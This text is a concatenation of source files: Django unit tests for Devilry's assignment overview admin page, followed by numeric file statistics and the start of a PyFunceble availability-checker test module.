# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertIn(
# 'Ready to publish the assignment',
# mockresponse.selector.one('#devilry_admin_assignment_overview_info_box').alltext_normalized
# )
# self.assertEqual(
# mock.call(appname='overview', args=(assignment.id, ), kwargs={}, viewname='publish_assignment_now'),
# mockresponse.request.cradmin_instance.reverse_url.call_args_list[0]
# )
# self.assertTrue(mockresponse.selector.exists('#devilry_admin_assignment_published_publishnow_form_info_box'))
def test_published_row(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#devilry_admin_assignment_overview_published h3').alltext_normalized,
"Was published: Jan 1 2000, 00:00")
def test_published_row_published_time_in_future(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(3000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#devilry_admin_assignment_overview_published h3').alltext_normalized,
"Will be published: Jan 1 3000, 00:00")
def test_published_row_buttons(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(3000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_published_publishnow_form input[type="submit"]')['value'],
'Publish now'
)
self.assertEqual(
mockresponse.selector.one(
"#devilry_admin_assignment_published_buttonrow a").alltext_normalized,
'Edit publishing time'
)
def test_published_row_buttons_when_already_published(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertFalse(
mockresponse.selector.exists(
"#devilry_admin_assignment_published_publishnow_form")
)
def test_settings_row_first_deadline(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_first_deadline a').alltext_normalized,
"Edit first deadline")
def test_settings_row_first_deadline_description(self):
assignment = baker.make('core.Assignment', first_deadline=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_first_deadline p').alltext_normalized,
"The first deadline is Saturday January 1, 2000, 00:00. This deadline is common for all "
"students unless a new deadline have been provided to a group.")
def test_settings_row_anonymization(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization a').alltext_normalized,
"Edit anonymization mode")
def test_settings_row_anonymization_description_when_anonymizationmode_off(self):
assignment = baker.make('core.Assignment')
# default = ANONYMIZATIONMODE_OFF
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_OFF))
def test_settings_row_anonymization_description_when_anonymizationmode_semi_anonymous(self):
assignment = baker.make('core.Assignment', anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
)
def test_settings_row_anonymization_description_when_anonymizationmode_fully_anonymous(self):
assignment = baker.make('core.Assignment', anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
)
def test_gradingconfiguration_row_heading(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_gradingconfiguration h2').alltext_normalized,
"Grading configuration")
# def test_gradingconfiguration_row_information_table_caption(self):
# assignment = baker.make('core.Assignment')
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information table caption').alltext_normalized,
# "Current setup")
# def test_gradingconfiguration_row_information_table_head(self):
# assignment = baker.make('core.Assignment')
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information table thead').alltext_normalized,
# "Description Grading")
def test_gradingconfiguration_examiner_chooses(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(1)').alltext_normalized,
'Examiner chooses')
def test_gradingconfiguration_examiner_chooses_passed_failed(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(2)').alltext_normalized,
str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
Assignment.GRADING_SYSTEM_PLUGIN_ID_PASSEDFAILED)))
def test_gradingconfiguration_examiner_chooses_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(2)').alltext_normalized,
str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)))
# def test_gradingconfiguration_examiner_chooses_schema(self):
# assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_SCHEMA)
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information '
# 'table tbody tr:nth-child(1) td:nth-child(2)').alltext_normalized,
# str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
# Assignment.GRADING_SYSTEM_PLUGIN_ID_SCHEMA)))
def test_gradingconfiguration_students_see(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(3)').alltext_normalized,
"Students see")
def test_gradingconfiguration_students_see_passed_failed(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
str(Assignment.POINTS_TO_GRADE_MAPPER_CHOICES_DICT.get(
Assignment.POINTS_TO_GRADE_MAPPER_PASSED_FAILED)))
def test_gradingconfiguration_students_see_points(self):
assignment = baker.make('core.Assignment', points_to_grade_mapper=Assignment.POINTS_TO_GRADE_MAPPER_RAW_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
str(Assignment.POINTS_TO_GRADE_MAPPER_CHOICES_DICT.get(
Assignment.POINTS_TO_GRADE_MAPPER_RAW_POINTS)))
def test_gradingconfiguration_students_see_schema(self):
assignment = baker.make('core.Assignment',
points_to_grade_mapper=Assignment.POINTS_TO_GRADE_MAPPER_CUSTOM_TABLE)
point_to_grade_map = baker.make('core.PointToGradeMap', assignment=assignment)
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=5,
maximum_points=9, grade='F')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=10,
maximum_points=14,grade='E')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=15,
maximum_points=19, grade='D')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=20,
maximum_points=24, grade='C')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=25,
maximum_points=29, grade='B')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=30,
maximum_points=35, grade='A')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
'F, E, D, C, B or A')
def test_gradingconfiguration_max_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(5)').alltext_normalized,
"Maximum number of points achievable")
def test_gradingconfiguration_max_points_100(self):
assignment = baker.make('core.Assignment', max_points=100,
grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(6)').alltext_normalized,
"100")
def test_gradingconfiguration_min_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(7)').alltext_normalized,
"Minimum number of points required to pass")
def test_gradingconfiguration_min_points_0(self):
assignment = baker.make('core.Assignment', passing_grade_min_points=0,
grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(8)').alltext_normalized,
"0")
def test_utilities_row_passed_previous(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous h3').alltext_normalized,
"Passed previous semester")
def test_utilities_row_passed_previous_description(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous p').alltext_normalized,
"Mark students that have passed this assignment previously.")
def test_utilities_button_passed_previous_period_text(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous_buttons'
).alltext_normalized,
'Edit passed previous semester'
)
class TestOverviewExaminerSection(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_sanity_no_relatedexaminer_no_other_warnings_shown(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
def test_sanity_students_without_examiners_and_no_examiners(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.parentnode)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
def test_sanity_students_without_examiners_and_more_relatedexaminer_than_examiners(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.parentnode)
related_examiner = baker.make('core.RelatedExaminer', period=assignment.parentnode)
baker.make('core.Examiner', relatedexaminer=related_examiner, assignmentgroup__parentnode=assignment)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
def test_assignment_meta_one_distinct_examiner_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
relatedexaminer = baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Examiner', relatedexaminer=relatedexaminer, assignmentgroup__parentnode=assignment)
baker.make('core.Examiner', relatedexaminer=relatedexaminer, assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('.devilry-admin-assignment-examiners-exists').alltext_normalized,
'1 examiner(s) configured')
def test_assignment_meta_multiple_examiners_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.Examiner', assignmentgroup__parentnode=assignment)
baker.make('core.Examiner', assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_examiners_meta_count_text').alltext_normalized,
'2 examiner(s) configured')
def test_assignment_meta_no_examiner_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('.devilry-admin-assignment-examiners-does-not-exist').alltext_normalized,
'No examiners configured')
def test_no_examiners_on_semester_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_empty_semester_warning'))
# Check warning text
self.assertTrue(mockresponse.selector.one('#id_devilry_admin_assignment_examiner_empty_semester_warning')
.alltext_normalized,
'warning: Go to the semester page and add/activate examiners')
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_periodadmin',
appname='overview',
roleid=assignment.parentnode.id,
viewname='INDEX'
)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_empty_semester_warning > strong > a').get('href'))
def test_students_without_examiners_exists_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
# Check warning text
self.assertIn(
'warning: There are students with no examiners assigned to them',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_students_without_examiner_warning')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
roleid=assignment.id,
viewname='INDEX'
)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning > strong > a').get('href'))
def test_no_examiners_configured_for_assignment_groups_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
# Check warning texts
self.assertIn(
'warning: No examiners configured',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment')
.alltext_normalized)
self.assertIn(
'Only configured examiners can see and correct deliveries from students.',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment')
.alltext_normalized)
# Check warning links
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment > strong > a').get('href'))
def test_fewer_examiners_than_relatedexaminers_on_semester_note(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
related_examiner = baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Examiner', relatedexaminer=related_examiner, assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
# Check warning text
self.assertIn(
'note: There are examiners on the semester that are not assigned to any students',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment > a').get('href'))
class TestOverviewStudentSection(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_sanity_no_relatedstudents_no_other_warnings_shown(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_active_students_on_semester'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_students_on_assignment'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
def test_sanity_no_candidates_on_assignment(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedStudent', period=assignment.parentnode)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_students_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_no_active_students_on_semester'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
def test_meta_text_has_two_candidates_and_two_assignment_groups(self):
assignment = baker.make('core.Assignment')
group1 = baker.make('core.AssignmentGroup', parentnode=assignment)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment)
baker.make('core.Candidate', assignment_group=group1)
baker.make('core.Candidate', assignment_group=group2)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'2 students organized in 2 project groups')
def test_meta_text_has_no_students(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'No students on the assignment')
def test_meta_text_has_multiple_students_in_group(self):
assignment = baker.make('core.Assignment')
group1 = baker.make('core.AssignmentGroup', parentnode=assignment)
group2 = baker.make('core.AssignmentGroup', parentnode=assignment)
baker.make('core.Candidate', assignment_group=group1)
baker.make('core.Candidate', assignment_group=group2)
baker.make('core.Candidate', assignment_group=group2)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertTrue(
mockresponse.selector.one('#id_devilry_admin_assignment_students_meta_count_text').alltext_normalized,
'3 students organized in 2 project groups')
def test_no_related_students_on_semester(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_student_no_active_students_on_semester'))
# Check warning text
self.assertIn(
'warning: Go to the semester page and add/activate students',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_active_students_on_semester')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_periodadmin',
appname='overview',
viewname='INDEX',
roleid=assignment.parentnode.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_no_active_students_on_semester > strong > a').get('href'))
def test_no_candidates_warning(self):
assignment = baker.make('core.Assignment')
baker.make('core.RelatedStudent', period=assignment.parentnode)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(mockresponse.selector.exists('#id_devilry_admin_assignment_student_no_students_on_assignment'))
# Check warning texts
self.assertIn(
'warning: No students added to the assignment',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_students_on_assignment')
.alltext_normalized)
self.assertIn(
'Only students added to an assignment can see the assignment and add deliveries',
mockresponse.selector.one('#id_devilry_admin_assignment_student_no_students_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='create_groups',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_no_students_on_assignment > strong > a').get('href'))
def test_students_on_the_semester_that_are_not_on_the_assignment_warning(self):
assignment = baker.make('core.Assignment')
baker.make('core.RelatedStudent', period=assignment.parentnode)
related_student = baker.make('core.RelatedStudent', period=assignment.parentnode)
baker.make('core.Candidate', relatedstudent=related_student, assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(mockresponse.selector.exists('#id_devilry_admin_assignment_student_on_semester_not_on_assignment'))
# Check warning text
self.assertIn(
'note: There are students who are on the semester, but not on the assignment',
mockresponse.selector.one('#id_devilry_admin_assignment_student_on_semester_not_on_assignment')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='create_groups',
viewname='INDEX',
roleid=assignment.id)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_student_on_semester_not_on_assignment > a').get('href'))
| 53.085329 | 130 | 0.716336 | 3,687 | 35,461 | 6.519392 | 0.082181 | 0.034447 | 0.07322 | 0.047843 | 0.858468 | 0.832758 | 0.801348 | 0.779798 | 0.762242 | 0.737779 | 0 | 0.010207 | 0.204281 | 35,461 | 667 | 131 | 53.164918 | 0.841656 | 0.087476 | 0 | 0.615842 | 0 | 0 | 0.266373 | 0.172316 | 0 | 0 | 0 | 0.001499 | 0.150495 | 1 | 0.091089 | false | 0.029703 | 0.027723 | 0 | 0.130693 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72a1f8b5414301a1a58e0637930e38bea7128efb | 119 | py | Python | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | dltools/__init__.py | DaehyunYou/sp8-delayline | 9146e82d8f363d4f8d20e4899df46f6fc97473b1 | [
"MIT"
] | null | null | null | from .hittypes import *
from .others import *
from .saclamodels import *
from .sp8models import *
from .units import *
| 19.833333 | 26 | 0.747899 | 15 | 119 | 5.933333 | 0.466667 | 0.449438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.168067 | 119 | 5 | 27 | 23.8 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
72b56c161c4222ab78f40d1e7350ee3f5f71362d | 42,027 | py | Python | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 213 | 2017-11-19T16:00:29.000Z | 2022-03-30T20:51:35.000Z | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 270 | 2018-01-10T12:42:41.000Z | 2022-03-22T00:03:23.000Z | tests/checker/availability/test_base.py | veracioux/PyFunceble | ffa045297beb4f07e5466e7c4005cfcb897cc51d | [
"Apache-2.0"
] | 48 | 2017-12-09T22:53:49.000Z | 2022-01-29T15:50:52.000Z | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of our availability checker base.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=too-many-lines
import unittest
import unittest.mock
from PyFunceble.checker.availability.base import AvailabilityCheckerBase
from PyFunceble.checker.availability.status import AvailabilityCheckerStatus
from PyFunceble.checker.base import CheckerBase
from PyFunceble.config.loader import ConfigLoader
from PyFunceble.query.dns.query_tool import DNSQueryTool
class TestAvailabilityCheckerBase(unittest.TestCase):
"""
The tests of our availability checker base.
"""
def setUp(self) -> None:
"""
Setups everything needed for the tests.
"""
self.checker = AvailabilityCheckerBase()
def tearDown(self) -> None:
"""
Destroys everything needed for the tests.
"""
del self.checker
def test_set_use_extra_rules_return(self) -> None:
"""
Tests the response of the method which let us activate the special
rules filtering.
"""
given = False
actual = self.checker.set_use_extra_rules(given)
self.assertIsInstance(actual, CheckerBase)
def test_set_use_extra_rules_method(self) -> None:
"""
Tests the method which let us activate the special rules filtering.
"""
given = False
expected = False
